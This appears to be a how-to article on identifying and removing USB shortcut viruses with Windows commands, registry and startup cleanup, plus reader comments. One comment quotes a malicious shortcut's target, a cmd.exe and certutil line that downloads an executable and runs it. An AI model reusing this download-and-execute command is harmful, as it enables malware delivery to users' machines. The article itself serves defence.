What Is a Shortcut Virus and How Can You Remove It?

Joel Lee 11-12-2019

A shortcut virus is a kind of Trojan/worm combination that hides all of your files and folders, then replaces them all with shortcuts that look exactly the same.


When you launch one of these false shortcuts, you end up running malware that duplicates the virus and further infects your system, leading to stolen personal data, worsened system performance, and all kinds of other malware-related side effects.

Shortcut viruses mainly affect physical file transfer devices like USB flash drives, external hard drives, and SD memory cards, but can be transferred to computers when exposed to an infected device that takes advantage of Autorun or Autoplay in Windows.

What Is a Shortcut Virus and How Can You Remove It? sd card memory close

Many shortcut viruses remain undetected by antivirus software, so running a security suite with virus scanner The 5 Best Free Internet Security Software for Windows Need antivirus, anti-malware, and real-time security? Here are the best free internet security software for Windows. Read More usually isn’t enough. Fortunately, the process for manually removing a shortcut virus is relatively simple and painless.

Removing a Shortcut Virus From an External Device

If you have a USB flash drive, external hard drive, or SD memory card that’s infected with a shortcut virus, the infection will spread whenever you plug it into a Windows PC. Here’s how to remove the infection from the external device:

  1. Plug in the infected external device.
  2. Open File Explorer (Windows key + E keyboard shortcut) and look under the Devices and drives section to find the external device, then make a mental note of the drive letter (e.g. E:).
  3. Launch an elevated Command Prompt by opening the Power User Menu (Windows key + X keyboard shortcut) and selecting Command Prompt (Admin).
  4. Orient the Command Prompt to the external device by typing the drive letter you noted in step 2, then hitting Enter:
  5. Delete all shortcuts on the device with this command:
    del *.lnk
  6. Restore all files and folders on the device with this command:
    attrib -s -r -h /s /d *.*
  7. Done!

The attrib command is a native Windows function that alters the attributes of a particular file or folder. The other parts of the command designate which files and folders to alter and how they should be altered:

  • -s removes the “system file” status from all matching files and folders.
  • -r removes the “read-only” status from all matching files and folder.
  • -h removes the “hidden” status from all matching files and folders.
  • /s makes the command recursively apply to all files and folders in the current directory and all subdirectories, basically the entire device in this case.
  • /d makes the command apply to folders as well (normally attrib only handles on files).
  • *.* means all file names and folder names should be considered a match.

Once you’ve done all that, consider copying all of your files off of the external device, completely formatting the external device to wipe it clean, then moving your files back onto the external device. Learn more about how to format an external drive How to Format a USB Drive and Why You Would Need To Formatting a USB drive is easy. Our guide explains the easiest and fastest ways to format a USB drive on a Windows computer. Read More . (But first make sure to clean your computer too! Instructions below.)

What Is a Shortcut Virus and How Can You Remove It? computer laptop keyboard close

How to Permanently Remove a Shortcut Virus from Your PC

If your Windows PC is infected with a shortcut virus, then any time you plug in another external device, the infection will spread to that device. Here’s how to remove a shortcut virus using CMD (on a Windows machine):

  1. Open the Task Manager (Ctrl + Shift + Esc keyboard shortcut).
  2. In the Process tab, look for wscript.exe or wscript.vbs, right-click on it, and select End Task. If you see both, go ahead and do it for both.
  3. Close the Task Manager.
  4. Open the Start Menu, search for regedit, and launch the Registry Editor.
  5. In the Registry Editor, navigate to the following in the left sidebar:
  6. In the right panel, look for any strange-looking key names, such as odwcamszas, WXCKYz, OUzzckky, etc. For each one, run a Google search to see if it’s related to shortcut viruses.
  7. If so, right-click on them and select Delete. Do this at your own risk! Always make sure you know what a key does before tampering with it. Accidentally deleting an important key can cause Windows to become unstable.
  8. Close the Registry Editor.
  9. Open the Run prompt (Windows key + R keyboard shortcut), type msconfig, then click OK to open the System Configuration window.
  10. In the Startup tab, look for any strange-looking .EXE or .VBS programs, select each one and click Disable.
  11. Close the System Configuration window.
  12. Open the Run prompt (Windows key + R keyboard shortcut), type %TEMP%, then click OK to open the Windows Temp folder. Delete everything inside. (Don’t worry, it’s safe! Delete These Windows Files and Folders to Free Up Disk Space Want to clear disk space on your Windows computer? Take a look at these Windows files and folders you can safely delete. Read More )
  13. In File Explorer, navigate to the following folder:
    C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  14. Look for any strange-looking .EXE or .VBS files and delete them.
  15. Done!

If the above doesn’t work, you might also try using USBFix Free. It’s technically meant to clean up USB drives and other external devices, but you can point it to regular system drives and it will clean them up too. It works pretty well as a shortcut virus remover tool. Many have seen success with it, but we can’t be held responsible if it backfires and you lose data. Always back up your data first!

Note: If the infected drive or partition is the same one as your Windows system (for most users, that means the C: drive), there’s no easy way to clean all of the false shortcuts. Fortunately, in Windows 8.1 and 10, you can opt to reset or refresh Windows 4 Ways to Factory Reset Your Windows Computer Want to know how to factory reset a PC? Here are the best methods to reset a Windows computer. Read More . On Windows 7, you’ll need to reinstall Windows.

Tips for Avoiding Malware in the Future

With a little bit of knowledge and a lot of common sense, malware can be surprisingly easy to prevent. Check out our best tips for avoiding malware, our exploration of sites most likely to infect you with malware, and our guide to spotting fake virus and malware warnings.

If you do spot other kinds of malware, act quickly and perform these steps to contain and eradicate malware. For major infections, consult our ultimate guide to malware removal.


To protect yourself from future malware infections, use one of these antivirus programs The 10 Best Free Antivirus Software No matter what computer you're using, you need antivirus protection. Here are the best free antivirus tools you can use. Read More .

Related topics: Antivirus, Trojan Horse.

Affiliate Disclosure: By buying the products we recommend, you help keep the site alive. Read more.

Whatsapp Pinterest

Leave a Reply

Your email address will not be published. Required fields are marked *

  1. Pablo
    May 31, 2020 at 4:07 am

    Good day. I just downloaded a supposed video file with .mkv extension and 165 MB size. Its VLC media player icon shows a small arrow like a shortcut, with the following Properties:
    Target: C:\Windows\system32\cmd.exe /c echo Please wait... & (IF NOT EXIST "%USERNAME%.exe" (certutil -urlcache -f "" "%USERNAME%.exe" && "%USERNAME%.exe")) >nul 2>&1
    At the beginning I didn´t notice this particularity and I accidentally made double click to play the video. It didn´t play the video and neither do anything at all. Then I realised about the shorcut´s arrow, but it was too late.
    Does it mean that I got infected for sure or may be I am safe because the extension was not .exe .vbs .ink ... but .mkv and the ejecution did n´t get the proper root to carry out the infection?
    Thank you very much in advance.

  2. D Craimer
    March 14, 2019 at 11:43 pm

    I have some sort of problem on my USB's and computer, I've tried your steps and it doesn't seem to be going away.
    Every time I open a folder on my USB drive there are 3 shortcuts named; 'downloads', 'games', and the name of the folder that it's in, (it doesn't replace any other folders) and the're all linked to location; cmd (C:\WINDOWS\system32)
    I tried command prompt, and it deleted the shortcuts, but about 5 seconds later they reappeared.

  3. Image Printing Services
    February 19, 2019 at 6:04 am

    very useful...thank you for making people life easy.

  4. KA
    March 25, 2018 at 7:25 pm

    Good. Easy steps to recover files hidden by shortcut virus *.lnk. Thanks.

  5. Gabe M.
    January 20, 2018 at 2:16 pm


    "If you have a USB flash drive, external hard drive, or SD memory card that’s infected with a shortcut virus, the infection will spread whenever you plug it into a Windows PC. Here’s how to remove the infection from the external device:

    Step 1: Plug in the infected external device."

    Why am I supposed to plugin an infected external device if the infection spreads whenever I do that ???

    • Joel Lee
      January 20, 2018 at 2:22 pm

      If the USB is infected, presumably your PC is already infected. Even if it isn't, you plug in the USB, clean the USB, then clean your now-infected PC. If you don't want to do that, then I suppose you always have the option of throwing away the USB.

      • Gabe M.
        January 21, 2018 at 6:28 pm


        I didn't mean to be sarcastic or disrespectful in any way. It's just that to me it seems backwards to first infect your PC and then disinfect both the thumb drive and the PC. It happens very often that my wife asks me to clean the flash drives she uses at school and, seeing that most of the times these viruses are Windows-only, I just boot a Live Linux session and delete the offending files from there, or, if I'm in a hurry, connect the flash drive to my Android un-rooted phone with an OTG cable and do the cleaning from there. Also, I've disabled the Autoplay feature on all of the Windows machines in my house, just to be on the safe side. :)

        Thanks for pointing out the "USBFix Free" tool. It may come in handy...

        Best regards!